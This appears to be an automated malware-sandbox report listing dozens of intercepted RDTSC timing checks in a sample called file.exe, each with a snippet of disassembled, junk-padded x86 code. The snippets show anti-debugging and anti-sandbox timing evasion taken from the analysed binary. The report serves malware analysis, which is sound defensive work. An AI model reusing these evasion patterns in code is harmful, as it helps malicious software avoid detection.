                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F84AE second address: 6F84B8 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F84B8 second address: 6F84BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F84BC second address: 6F84C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F84C4 second address: 6F84CF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007F6C54B58546h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FE463 second address: 6FE46C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FD3AB second address: 6FD3AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FD3AF second address: 6FD3BA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FD4EA second address: 6FD51D instructions: 0x00000000 rdtsc 0x00000002 jl 00007F6C54B58546h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jng 00007F6C54B5854Ah 0x00000012 push edx 0x00000013 pop edx 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F6C54B58559h 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FD51D second address: 6FD538 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C544CAC30h 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FD679 second address: 6FD69F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6C54B5854Eh 0x00000009 jmp 00007F6C54B58554h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FD69F second address: 6FD6A9 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F6C544CAC2Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FD6A9 second address: 6FD6CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 jmp 00007F6C54B58556h 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FD6CB second address: 6FD6D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FD803 second address: 6FD827 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F6C54B58546h 0x00000008 jl 00007F6C54B58546h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jmp 00007F6C54B58554h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FDD8E second address: 6FDD94 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FDD94 second address: 6FDDA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007F6C54B58548h 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FDDA2 second address: 6FDDAC instructions: 0x00000000 rdtsc 0x00000002 js 00007F6C544CAC32h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FDDAC second address: 6FDDB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FDEF6 second address: 6FDF29 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007F6C544CAC2Bh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e jmp 00007F6C544CAC34h 0x00000013 push edi 0x00000014 pop edi 0x00000015 pop edx 0x00000016 jc 00007F6C544CAC28h 0x0000001c push edx 0x0000001d pop edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FDF29 second address: 6FDF2E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FE046 second address: 6FE04C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FE04C second address: 6FE063 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C54B5854Bh 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f push edi 0x00000010 pop edi 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FE063 second address: 6FE069 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FE199 second address: 6FE19F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70145D second address: 701462 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 704135 second address: 70417A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp], eax 0x00000008 push 00000000h 0x0000000a push ecx 0x0000000b call 00007F6C54B58548h 0x00000010 pop ecx 0x00000011 mov dword ptr [esp+04h], ecx 0x00000015 add dword ptr [esp+04h], 0000001Bh 0x0000001d inc ecx 0x0000001e push ecx 0x0000001f ret 0x00000020 pop ecx 0x00000021 ret 0x00000022 push 00000004h 0x00000024 stc 0x00000025 mov edx, 1F5E95DCh 0x0000002a call 00007F6C54B58549h 0x0000002f js 00007F6C54B58554h 0x00000035 pushad 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70417A second address: 704180 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 704180 second address: 7041C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 jmp 00007F6C54B5854Ch 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f push ecx 0x00000010 jnp 00007F6C54B5854Ch 0x00000016 pop ecx 0x00000017 mov eax, dword ptr [eax] 0x00000019 jmp 00007F6C54B58557h 0x0000001e mov dword ptr [esp+04h], eax 0x00000022 push eax 0x00000023 push edx 0x00000024 push ecx 0x00000025 pushad 0x00000026 popad 0x00000027 pop ecx 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7041C7 second address: 7041CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 705ABC second address: 705AC0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 705AC0 second address: 705AC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 705AC6 second address: 705AEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jne 00007F6C54B5855Fh 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 705AEB second address: 705AF2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 705AF2 second address: 705B08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6C54B5854Ch 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 707A51 second address: 707A6E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C544CAC38h 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 707A6E second address: 707A8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F6C54B58550h 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 707A8D second address: 707A97 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F6C544CAC26h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 707A97 second address: 707AC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edx 0x00000008 pop edx 0x00000009 jmp 00007F6C54B58557h 0x0000000e jmp 00007F6C54B5854Ah 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A11C42 second address: 4A11C48 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A11C48 second address: 4A11C4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A11C4C second address: 4A11C50 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A11C50 second address: 4A11CB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F6C54B58556h 0x0000000e xchg eax, ecx 0x0000000f pushad 0x00000010 mov ecx, 7FFD42FDh 0x00000015 call 00007F6C54B5854Ah 0x0000001a call 00007F6C54B58552h 0x0000001f pop eax 0x00000020 pop ebx 0x00000021 popad 0x00000022 call dword ptr [755D188Ch] 0x00000028 mov edi, edi 0x0000002a push ebp 0x0000002b mov ebp, esp 0x0000002d push ecx 0x0000002e mov ecx, dword ptr [7FFE0004h] 0x00000034 mov dword ptr [ebp-04h], ecx 0x00000037 cmp ecx, 01000000h 0x0000003d jc 00007F6C54B8A025h 0x00000043 mov eax, 7FFE0320h 0x00000048 mov eax, dword ptr [eax] 0x0000004a mul ecx 0x0000004c shrd eax, edx, 00000018h 0x00000050 mov esp, ebp 0x00000052 pop ebp 0x00000053 ret 0x00000054 push eax 0x00000055 push edx 0x00000056 pushad 0x00000057 mov cx, bx 0x0000005a call 00007F6C54B5854Fh 0x0000005f pop eax 0x00000060 popad 0x00000061 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A11CB2 second address: 4A11B98 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C544CAC36h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a jmp 00007F6C544CAC30h 0x0000000f ret 0x00000010 nop 0x00000011 xor esi, eax 0x00000013 lea eax, dword ptr [ebp-10h] 0x00000016 push eax 0x00000017 call 00007F6C58AD2FF4h 0x0000001c mov edi, edi 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 call 00007F6C544CAC33h 0x00000026 pop ecx 0x00000027 pushfd 0x00000028 jmp 00007F6C544CAC39h 0x0000002d sub ecx, 7CAF1726h 0x00000033 jmp 00007F6C544CAC31h 0x00000038 popfd 0x00000039 popad 0x0000003a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A11B98 second address: 4A11B9E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A11B9E second address: 4A11BE4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 pushad 0x0000000a mov ax, 7D61h 0x0000000e push ecx 0x0000000f mov cx, di 0x00000012 pop edx 0x00000013 popad 0x00000014 mov dword ptr [esp], ebp 0x00000017 jmp 00007F6C544CAC34h 0x0000001c mov ebp, esp 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F6C544CAC37h 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A11BE4 second address: 4A11BF6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, cx 0x00000006 mov edi, esi 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A11BF6 second address: 4A11BFA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A11BFA second address: 4A11C00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A119C9 second address: 4A119ED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C544CAC2Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F6C544CAC30h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A119ED second address: 4A119FC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C54B5854Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B0C42 second address: 49B0C52 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6C544CAC2Ch 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B0C52 second address: 49B0C83 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 jmp 00007F6C54B5854Ch 0x0000000e mov dword ptr [esp], ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F6C54B58557h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B0C83 second address: 49B0C89 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49E0759 second address: 49E0799 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C54B58551h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F6C54B58551h 0x0000000f xchg eax, ebp 0x00000010 jmp 00007F6C54B5854Eh 0x00000015 mov ebp, esp 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a mov esi, edx 0x0000001c pushad 0x0000001d popad 0x0000001e popad 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49E0799 second address: 49E07CF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C544CAC34h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+04h] 0x0000000c pushad 0x0000000d mov ax, E91Dh 0x00000011 push eax 0x00000012 mov dh, 57h 0x00000014 pop ecx 0x00000015 popad 0x00000016 push dword ptr [ebp+0Ch] 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c mov esi, 3C0D9B89h 0x00000021 mov eax, 16AB6745h 0x00000026 popad 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49E07CF second address: 49E07D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49E07D5 second address: 49E07D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49E07D9 second address: 49E07F3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push dword ptr [ebp+08h] 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F6C54B5854Bh 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49E07F3 second address: 49E07F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49E07F9 second address: 49E0808 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6C54B5854Bh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C0C86 second address: 49C0C8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C0C8A second address: 49C0CA5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C54B58557h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C0CA5 second address: 49C0D04 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F6C544CAC2Fh 0x00000009 and cx, 7DEEh 0x0000000e jmp 00007F6C544CAC39h 0x00000013 popfd 0x00000014 mov eax, 7A4B1D77h 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c push eax 0x0000001d jmp 00007F6C544CAC2Dh 0x00000022 xchg eax, ebp 0x00000023 jmp 00007F6C544CAC2Eh 0x00000028 mov ebp, esp 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f popad 0x00000030 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C0D04 second address: 49C0D08 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C0D08 second address: 49C0D0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A11755 second address: 4A11788 instructions: 0x00000000 rdtsc 0x00000002 mov ch, dl 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, ebp 0x00000008 jmp 00007F6C54B58550h 0x0000000d mov ebp, esp 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F6C54B58557h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A11788 second address: 4A1178D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A1178D second address: 4A117CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 movsx edx, cx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebp 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F6C54B5854Ah 0x00000012 or ax, 48A8h 0x00000017 jmp 00007F6C54B5854Bh 0x0000001c popfd 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F6C54B58556h 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A117CD second address: 49B0C42 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F6C544CAC32h 0x00000008 and esi, 3D8E7638h 0x0000000e jmp 00007F6C544CAC2Bh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 popad 0x00000017 jmp dword ptr [755D155Ch] 0x0000001d mov edi, edi 0x0000001f push ebp 0x00000020 mov ebp, esp 0x00000022 mov ecx, dword ptr fs:[00000018h] 0x00000029 mov eax, dword ptr [ebp+08h] 0x0000002c mov dword ptr [ecx+34h], 00000000h 0x00000033 cmp eax, 40h 0x00000036 jnc 00007F6C544CAC2Dh 0x00000038 mov eax, dword ptr [ecx+eax*4+00000E10h] 0x0000003f pop ebp 0x00000040 retn 0004h 0x00000043 test eax, eax 0x00000045 je 00007F6C544CAC43h 0x00000047 mov eax, dword ptr [00459710h] 0x0000004c cmp eax, FFFFFFFFh 0x0000004f je 00007F6C544CAC39h 0x00000051 mov esi, 00401BB4h 0x00000056 push esi 0x00000057 call 00007F6C58A726C6h 0x0000005c mov edi, edi 0x0000005e push eax 0x0000005f push edx 0x00000060 jmp 00007F6C544CAC2Dh 0x00000065 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A0734 second address: 49A0751 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C54B58559h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A0751 second address: 49A0782 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C544CAC31h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ecx, dword ptr [ebp+08h] 0x0000000c jmp 00007F6C544CAC2Eh 0x00000011 sub eax, eax 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 movzx eax, bx 0x00000019 mov ecx, edx 0x0000001b popad 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A0782 second address: 49A07B0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C54B58550h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 inc eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F6C54B58557h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A07B0 second address: 49A081D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, 98DAh 0x00000007 call 00007F6C544CAC2Bh 0x0000000c pop eax 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 lock xadd dword ptr [ecx], eax 0x00000014 jmp 00007F6C544CAC2Fh 0x00000019 inc eax 0x0000001a jmp 00007F6C544CAC36h 0x0000001f pop ebp 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 pushfd 0x00000024 jmp 00007F6C544CAC2Dh 0x00000029 add cx, 2B66h 0x0000002e jmp 00007F6C544CAC31h 0x00000033 popfd 0x00000034 mov di, cx 0x00000037 popad 0x00000038 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A081D second address: 49A0823 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A0823 second address: 49A0827 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10010 second address: 4A1001F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C54B5854Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A1001F second address: 4A10084 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C544CAC39h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F6C544CAC2Eh 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 movzx ecx, di 0x00000016 pushfd 0x00000017 jmp 00007F6C544CAC39h 0x0000001c sbb cx, 7E56h 0x00000021 jmp 00007F6C544CAC31h 0x00000026 popfd 0x00000027 popad 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10084 second address: 4A1008A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A1008A second address: 4A10104 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C544CAC33h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d mov edx, eax 0x0000000f mov ax, 69A7h 0x00000013 popad 0x00000014 mov ebp, esp 0x00000016 pushad 0x00000017 call 00007F6C544CAC38h 0x0000001c pushfd 0x0000001d jmp 00007F6C544CAC32h 0x00000022 or si, 0D38h 0x00000027 jmp 00007F6C544CAC2Bh 0x0000002c popfd 0x0000002d pop ecx 0x0000002e push edx 0x0000002f mov di, si 0x00000032 pop esi 0x00000033 popad 0x00000034 mov eax, dword ptr fs:[00000030h] 0x0000003a push eax 0x0000003b push edx 0x0000003c jmp 00007F6C544CAC2Ah 0x00000041 rdtsc
